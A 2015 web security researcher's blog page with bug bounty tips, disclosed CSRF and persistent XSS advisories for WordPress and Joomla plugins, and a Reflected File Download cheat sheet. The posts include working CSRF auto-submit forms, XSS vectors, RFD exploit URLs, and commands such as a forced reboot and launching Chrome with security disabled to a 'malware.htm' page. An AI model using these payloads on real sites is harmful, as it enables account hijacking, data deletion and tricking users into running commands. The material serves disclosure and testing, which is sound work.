David Sopas

web security researcher

David Sopas – Web Security Researcher
START READING
21/10/15 Interesting Readings # , ,

Attacking Ruby on Rails

Attacking Ruby on Rails

I want to share a interesting reading that I noticed when searching Mr. G for Ruby security.
I still didn’t finished reading it because lack of time but this weekend this will be on my to-do list.

Paper: http://phrack.org/papers/attacking_ruby_on_rails.html

0 likes no responses
21/10/15 Swag # , , ,

Hack to the Future with Cobalt

Hack to the Future with Cobalt

Cobalt.io published a nice image on Twitter with some of the security researchers. Can you guess who’s there?

0 likes no responses
16/10/15 Tips and Tricks # , , , , , ,

Get a bounty on a WordPress blog

Get a bounty on a WordPress blog

I would like describe a step-by-step of my latest “appreciation program” reward on a security issue in a WordPress plugin.
First things first – check if the blog is in-scope of the program. If it is, continue to read this article. If not, you can just see my other tips about #bugbounty (here  and here).

I’m a big fan of WPScan. It’s a great Ruby tool to scan a WordPress installation. It uses a black box approach but still a must use in my opinion.
WPScan didn’t find any real security issue on my target but showed me the list of plugins used:

ruby wpscan.rb –url www.target.com –enumerate p

So I picked one by one to search for open vulnerabilities or something interesting on their changelog. Nothing…
I needed to start auditing them.

I picked Events Made Easy plugin  and installed it on my local box. The plugin is quite simple and I noticed that nonce WordPress security token or any other form protection was missing in some places [when auditing the source-code]. Also some of the variables were not sanitized so I could attack it with a CSRF and a Persistent XSS.

I started creating a proof-of-concept based on my findings – check the advisory.
I reported the security issue to the “appreciation program”, vendor and requested a CVE reference.

So my steps were:

  1. WordPress blog is in scope for reward
  2. Scan it with WPScan [don’t forget to enumerate the plugins]
  3. Analyze the results
  4. If scanning got you a vulnerability, report it! If not, download the plugins used, audit the source-code and create a proof-of-concept

Here you have some public bounties I found on Nexmo on their blog – https://cobalt.io/nexmo/reports/17 and https://cobalt.io/nexmo/reports/18

Small tip: Sometimes even a full disclosure can get you a small bounty 🙂 https://cobalt.io/nexmo/reports/15

0 likes no responses
16/10/15 Tips and Tricks # , , ,

Free online proxy using Bing Translator

Free online proxy using Bing Translator

This method is already known on many other servers like Google Translator and other online services.
I don’t know if I might consider this to be a security issue. Let’s call it a special Bing Translator feature 🙂

Using Bing Translator service anyone can use their IP addresses as a proxy. Malicious users could use this method as a plataform to launch web attacks like (xss, sql injection, etc). Also users could use this service to visit blocked sites.

Example:

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/XXE

I noticed that on my webserver logs that I had two requests made by 157.56.2.63 [msnbot-157-56-2-63.search.msn.com]

Other example to show the IP of the user (ip.php just shows $_SERVER[“REMOTE_ADDR”]):

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/poc/ip.php

I notice that if you make both languages in the same pair (i.e., en-en for English to English), the translation is effectively skipped but the requested web content is still served from Microsoft servers.

Google in the past had the same issue. They fixed the pair issue part to prevent misuse of their translation service. Now in Google Translator you always need to choose a different language every time.

0 likes no responses
15/10/15 Advisories # , , , , ,

Events Made Easy WordPress plugin CSRF + Persistent XSS

Events Made Easy WordPress plugin CSRF + Persistent XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting

Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add events list, calendars and description to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.

When playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they can could cause damage to a WordPress installation.
All of them are related to CSRF where the vendor forgot to place a security token (wp_nonce) on the affected forms.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If a authenticated admin clicks on the “Add template” button on a html with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

It will add a Persistent XSS vector on the template description field. This field is automatically executed when the admin visits the page admin.php?page=eme-templates.

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious sends admin a link to the page that has a auto-submit form with a XSS vector that hijacks victims browser
  3. Victim visits the page and gets hijacked

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If a authenticated admin clicks on the “Add field” button on a html with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

Like vulnerability #1 the attack scenario is the same. Same issue affects form fields on this plugin.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all the events older than a certain number.
In my proof of concept I used a auto-submit form that could also be used in vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script> 

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious sends admin a link to the page that has this auto-submit form
  3. Without victim noticing, events older than 1 day will be removed.

Solution:
Vendor in a matter of few hours launched a patched version – 1.5.50. Also he was kind enough to put my name on the changelog.

0 likes one response
12/10/15 Bug Bounty , Tips and Tricks # , ,

Free online tools to help your #bugbounty

Free online tools to help your #bugbounty

I’m getting a few emails asking some tips on how to get some bounties. Because I like to help others and I’m a share knowledge believer 🙂 I wrote this small article about using the right online tools and earn some bucks on bounty programs.

Most experience bug hunters already know most of this tools but this is mostly for starters.

SSL validation
URL: https://www.ssllabs.com/ssltest/

Qualys provides a free online tool that runs a complete test on a target SSL. Heartbleed, OpenSSL CCS vuln, BEAST, POODLE, etc all of these are covered in this online test.

Missing SPF? Let’s test it…
URL: http://www.kitterman.com/spf/validate.html

These tools are meant to help you check SPF records on your target. For many bug bounties participants this is one of the first things to try. Usually get’s the minimum payout if in-scope. On HackerOne, Shopify already paid $500 on this missing email security header – https://hackerone.com/reports/54779

Test X-FRAME-Options
URL: http://savanttools.com/test-frame

This tool is useful for detecting sites that use the X-FRAME-OPTIONS header to block framing, or use frame-breaking / frame-busting Javascript. Clickjacking attacks can be achieved with the help of this tool.

Find subdomains of a domain
URL: https://pentest-tools.com/information-gathering/find-subdomains-of-domain

pentest-tools.com offers 40 credits every day to a user for free and using this information gathering information on the subdomains will take you 20 credits so you can use it twice a day. This is very usefull to find other domain targets.

Online fuzzer
URL: https://pentest-tools.com/website-vulnerability-scanning/discover-hidden-directories-and-files

With only 10 credits [you have 40 credits every day] this online URL Fuzzer can be used to find hidden files and directories on a web server.
This is a discovery activity which allows you to discover resources that were not meant to be publicly accessible (ex. /backups, /index.php.old, /archive.tgz, /source_code.zip, etc).
With a file/direcotry fuzzer you can always find interesting stuff. I already found a couple of phpinfo.php files on major companies and got few bounties with them.

Using Drupal?
URL: https://hackertarget.com/drupal-security-scan/

With this online you get a overview of the Drupal version used, template name, if directory indexing is enabled, etc. Some of this information you could use to run further tests and determine if you can get someting vulnerable from the Drupal instalation.

Using WordPress?
URL: https://hackertarget.com/wordpress-security-scan/

I’m a big fan of wp-scan but if you need a free online tool HackerTarget will do a good job for you.
This tool will check the version of WordPress, check directory indexing, list plugins [and if new updates are available], user enumeration, etc. With this information you can check for vulnerable plugins and provide a good report about that.

Using Joomla?
URL: https://hackertarget.com/joomla-security-scan/

Like the previous tools this one also checks for Joomla instalattions information. Take a look into the plugins/components. Usually there are something to look for. Compare versions and Google for changelogs about vulnerabilities. Very often in the changelog the vulnerability is not public but if it says CSRF on options-windows.php. Just try to download that version and audit it yourself. I’ll do that 🙂

Target store using Magento?
URL: https://www.magereport.com/

Scan your targets Magento shop for known security vulnerabilities. This is a very useful tool that can get a few vulnerabilities in your bounty quest.

I would like to add that there are better tools that could be installed on your operating system but that could be on another article 🙂

Tip 1: Always read carefully the bounty program details to check what’s in-scope. Always respect the rules.
Tip 2: Don’t forget also to read my article. Don’t copy paste your online results on the report and voila!

0 likes one response
08/10/15 Bug Bounty , Tips and Tricks # , , , ,

A tip for bug hunters – Sell your service

A tip for bug hunters – Sell your service

As a bug hunter at Cobalt, HackerOne and BugCrowd I always try do my best to give programs the best information needed to understand the security report.
Sometimes I notice that some public disclosures on HackerOne have just two or three paragraphs like:

You guys don’t have SPF header on your mail server.
Check it online here: …

If I was the program manager I would categorize this like “WTF” bug or something. Not for the vulnerability itself but because the lack of information and effort by the bug hunter. You need to sell your service. You need to show the program that you care and you know what you are talking about. Treat the program like your client.
Sometimes this make the difference between earning kudos and earning money.

Elaborate the security vulnerability as much as possible and describe possible attack scenarios. Screenshots and videos are always a bonus.
Also show the “client” clear solutions for their problem.

Hey this is just a small tip… Hope it makes difference on your future reports!

0 likes one response
06/10/15 Papers # , , , ,

Reflected File Download Cheat Sheet

Reflected File Download Cheat Sheet

This article is focused on providing infosec people how to test and exploit a Reflected File Download vulnerability – discovered by Oren Hafif of Trustwave. This vulnerability is not very well known but if well implemented could be very dangerous.
I’ve been writing security reports on RFD since January 2015 (most still undisclosed) and found lot’s of interesting things based on that experience that I would like to share.
I’m not explaining in this cheat sheet what RFD is or make a fancy presentation about it. For that you have Oren Hafif Blackhat presentation and Trustwave paper.

 

0x1 Where to look

Most of the RFD attacks are found on JSON and JSONP APIs [like auto-complete, user information, search box, order filters, etc.]. Most modern web applications this days use it.
You should start looking into your proxy [Burp, ZAP, etc] or Google Inspector for XHR requests. They’re are usually the prime suspect to find RFD attacks.
Don’t discard other requests like scripts. I already found a RFD attack on a JS file on Google which got me a entry on their Hall-of-Fame.
So keep your eyes open and think outside-the-box.

 

0x2 How to test it

Try to see if a callback parameter is present on the request:

https://www.example-site.pt/api/search?term=f00bar&callback=jQuery_1234

If callback is present try to change it to calc.

https://www.example-site.pt/api/search?term=f00bar&callback=calc

If calc is reflected on the screen it’s a good thing. If not maybe the victim has a whitelist of callbacks. But don’t give up yet. Try to find other parameter that could be reflected.
In my example you can see term parameter. Try to inject the following search term:

"||calc||

If the double-quote is slashed and pipe chars are not encoded you got the attack reflected.

https://www.example-site.pt/api/search?term="||calc||&callback=calc

Important: Even if the callback is not present in the request try to inject it. Most of the cases it’s there 🙂

If you can’t inject a callback try to inject the vector on another parameter that is reflected. Take in mind that it should be accessible to anyone not only by you. No Self-RFD in here 🙂

Ok so you have a reflected callback or reflected injected parameter. What we’ll try next is filename manipulation if URL mapping is permissive.

Some things you might try:

https://www.example-site.pt/api/search.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat;?term=f00bar&callback=calc

You can use other extensions also. Use your imagination. You can use .bat, .cmd, .js, .vbs and even other formats to attack *nix users – http://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/

 

0x3 Can’t get download dialog

If the server don’t have Content-Disposition: attachment header to force the download you must use HTML5 download attribute to do this. On Internet Explorer 8 and 9, which interpret JSON as attachment, it will automatically try to download.

HTML5 download attribute is available in the following browsers:

  • Chrome
  • Firefox (you need to hack it a little to work)
  • Opera

Example 1:

<a href="https://www.example-site.pt/api/setup.bat?callback=chkdsk" download="setup.bat">Download</a>;

In Example 1 you can just click the link Chrome and Opera will download search.bat. On Firefox you must force the “Save link as” by adding on the:

<a href> onclick="return false;"

Example 2:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat">Download</a>;

Just by clicking on the Download link Chrome and Opera will download setup.json. You must force the download with “Save link as” like Firefox. So:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat" onclick="return false">Download</a>

Reminder: Keep noticing what is the returned HTTP code. It must be 200. 401 and 403 will not lead to RFD attacks.

 

0x4 Real Scenarios (all of them fixed)

Desk @ http://www.davidsopas.com/desk-com-reflected-filename-download/

Desk web app allowed a malicious user to have a direct URL to a malicious download.
Because they had Content-Disposition: attachment header this URL:
https://support.desk_com_client.com/customer/portal/articles/autocomplete.bat?&term=calimdshd&callback=||start%20chrome%davidsopas.com/poc/malware.htm||

Worked in every browser – downloading it without using any other manipulation. An example of a perfect RFD attack.

Acunetix @ https://www.davidsopas.com/acunetix-got-rfded/

Needed to use a special crafted webpage to download the file so this one it’s a nice example of the HTML5 download attribute.

Google @ http://www.websegura.net/advisories/reflected-filename-download-on-google/

This one is to show you guys that you don’t need a JSON file to get a RFD attack. Even a JS file which reflects your information will do the job.

 

0x5 RFD vectors

If you want to just give a proof-of-concept to a vendor you can just use a innocent calc from Windows or open a Chrome window with your site.
If you want to demonstrate with other vectors I give you a small list:

  • calc [runs Windows calculator]
  • chkdsk [runs Windows check disk utility]
  • start chrome davidsopas.com/poc/malware.htm [open a new chrome window with the defined URL]
  • start chrome davidsopas.com/poc/malware.htm –disable-web-security –disable-popup-blocking [open a new chrome
  • window with security options disabled with the defined URL]
  • shutdown -t 0 -r -f [force a Windows immediate reboot]

Don’t forget that you can use any command you wish depending on the operating system of the victim.

 

0x6 Bonus tricks

  • Sometimes you may enconter callbacks being filtered for spaces and special chars. If this is the case you can always use a RFD vector that fits this filtering (check 0x5 RFD vectors).
  • If the executable file is a .bat file don’t forget that there’s a limit on it’s content. If the JSON file you are using is too big, the batch file will not run your RFD attack. Try removing some of the parameters to reduce the lenght of the file.
  •  JSON/JSONP error messages sometimes could be your best friend. Some of them reflect the parameters you inject and return a HTTP 200 code.
  • If request header accepts text/html and tags are not filtered you can try inject a callback with HTML and make it a Reflected XSS:

https://www.example-site.pt/api/search.htm?term=f00bar&callback=calc<svg onload=prompt(1)>

  • If you can’t get a reflected vector on the request and you have a URL which is accessible to authenticated users you can use fields to inject the RFD vector.
    Example:

https://www.example-site.pt/1/members/dsopas

{"id":"1234567", "name":"David Sopas"}

You can inject your RFD vector:

"||calc||

on your name and use your link to attack.

{"id":"1234567", "name":"\";||calc||"}

This shows that sometimes you don’t even need the callback or parameter on the URL to use a RFD attack.

  • If your .bat don’t run, copy-paste it’s content to cmd.exe and check what it’s going on.
  • Sometimes when you call the XHR URL directly it shows you the file in XML. Add ?format=json and you might get lucky!

 

0x7 How to fix it

I think the best solution is to use the header Content-Disposition with a defined filename:

Content-Disposition: attachment; filename=1.txt

That way it’s impossible (so far) to modify the filename and most important filename extension.
Also if you use callbacks try to whitelist them. Finally encode (not escape) values reflected on the request.

 

0x8 Affected sites/companies

Should I be worried about RFD? YES!
Imagine a way of tricking victims into downloading a malicious filename using your domain? It’s very important to think that this is not a social-engineering attack but it only uses part of it (abusing human-factor) to gain trust of your client into downloading a file [that you didn’t upload]
If your client or visitor is not a security expert and is just a normal Internet user he will trust the link, download the file and execute it. People are doing this even without the trusted domain imagine with that option.

Oren Hafif said in his BlackHat presentation:

4 out of 5 would trust downloads based on the hosting domain.
RFD uses trust to do evil.

My advice is… Patch it before it too late.

 

0x9 Thanks

Oren Hafif -> for discovering this type of vulnerability
David Vassallo -> for showing a *nix version of the RFD attack
Ashar Javed -> for giving me the idea of publishing this cheat sheet about RFD and for calling me “RFD Machine” 🙂

 

0xA Other related Reflected File Download links

0 likes 2 responses
30/09/15 Advisories # , , , , , ,

Komento Joomla! component Persistent XSS

Komento Joomla! component Persistent XSS

CVE Reference: CVE-2015-7324

Komento is a Joomla! comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found out that was possible to launch a Persistent XSS attack when adding a new comment using the WYSIWYG website and image buttons.
This issue was critical in both environments – frontend and backoffice.

In frontend when a user visited a page where the comment has a XSS attack it would be automatically affected.
In the other side – the backoffice – when the admin checked the new comment it would be vulnerable to this attack and could get his account hijacked or something even more dangerous.

What I did was to pass along the XSS vector in the [img] code and use the Javascript onload to run the exploit when image loads.

Proof-of-concept using [img]:

[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg” onload=”prompt(1)[/img]

Proof-of-concept using [url]:

[url=”https://www.davidsopas.com” onmouseover=”prompt(1)”]Your text to link[/url]

komento_onmouseover

In the [img] case this will reflect the following HTML (on the frontend):

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;" onload="var elem=this;if (this==window) elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

komento_frontend

And…

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;">

In the administrator area.

This Joomla! component has lot’s of Google results and can affect a large number of innocent people. A victim just by visiting the page with a malicious comment will be affected.

All versions prior to 2.0.5 are affected.
Vendor already patched both security issues in the new version 2.0.5 – http://stackideas.com/changelog/komento

0 likes no responses
29/09/15 Interesting Readings # , ,

Bug Hunter Appreciation Programs

Interesting reading about security bug bounty written by Eduardo Vela – http://sirdarckcat.blogspot.pt/2015/09/not-about-money.html

You got to love this part:

It is my view, that we shouldn’t call them “Bug Bounty Programs”, I would like them to be called “Bug Hunter Appreciation Programs”. I don’t like the term “Bug Bounty”, because bounty sounds a lot like it’s money up for grabs, when the attitude is that of a gift, or a “thank you, you are awesome”.

0 likes no responses
1 2 3 4 5 6 7 8